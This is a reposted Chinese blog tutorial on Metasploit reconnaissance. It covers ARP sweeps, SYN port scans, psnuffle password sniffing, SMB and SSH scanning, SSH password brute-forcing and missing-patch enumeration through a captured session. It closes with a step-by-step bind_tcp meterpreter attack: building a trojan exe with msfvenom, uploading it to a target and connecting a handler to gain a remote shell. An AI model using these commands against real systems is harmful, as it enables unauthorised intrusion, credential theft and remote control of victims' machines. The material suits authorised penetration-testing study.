jQuery火箭图标返回顶部代码

MSF信息收集

转载自天堂空气


一 MSF主机发现

0x1:搜索arp

1.png

0x2:使用use auxiliary/scanner/discovery/arp_sweep 模块,然后show options.2.png

INTERFACE => 网卡接口   RHOSTS => 扫描的范围   SHOST => 伪造源IP SMAC=>伪造源MAC地址  THREADS=>线程 TIMEOUT=>超时5秒

0x3: run之后,查看hosts结果,扫描到以下主机

3.png

                                                                                           二 MSF端口扫描

0x1:搜索portscan模块。1.png

0x2:使用auxiliary/scanner/portscan/syn 模块

2.png

设置RHOSTS为地址范围。 PORTS为要扫描的端口。 THREADS为线程

 

 

                                                                            三 MSF密码嗅探

0x1: use auxiliary/sniffer/psnuffle (目前只支持pop3 imap ftp http get协议)

1.png


                                                                                     四 SMB服务扫描

0x1:SMB版本扫描

use auxiliary/scanner/smb/smb_version

1.png

0x2:扫描命名管道,判断SMB服务类型

use auxiliary/scanner/smb/pipe_auditor

2.png

                                                                                                    五 SSH

SSH版本扫描:

use auxiliary/scanner/ssh/ssh_version

SSH密码爆破

use auxiliary/scanner/ssh/ssh_login

SSH公钥登陆

use auxiliary/scanner/ssh/ssh_login_pubkey

                                                                                        六 Windows缺少的补丁收集

-基于已经取得的session来进行检测

1.png

-使用 use post/windows/gather/enum_patches模块来进行检测

2.png

SESSION选择刚刚获取的shell会话。

-开始扫描 run

3.png

如果出现[-] Known bug in WMI query, try migrating to another process

解决办法,移植进程。 getpid=>查看当前所在进程  ps=>查看所有进程 migrate 1036=>移植进程 1036

4.png
-再开始扫描 run -成功查看缺少的补丁

5.png

 

 

0x02  bind_tcp

正向连接,

生产payload

msfvenom -p windows/meterpreter/bind_tcp lport=8080 -f exe -o 1.exe

2.将上一步生成的木马上传至目标服务器

进入msfconsole,设置攻击payload

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name Current Setting Required Description
   ---- --------------- -------- -----------


Payload options (windows/meterpreter/bind_tcp):

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
   LPORT 4444 yes The listen port
   RHOST no The target address


Exploit target:

   Id Name
   -- ----
   0 Wildcard Target


msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > set RHOST X.X.X.X //被攻击ip
RHOST => X.X.X.X
msf5 exploit(multi/handler) > exploit

原文地址:https://www.cnblogs.com/kuaile1314/p/11583575.html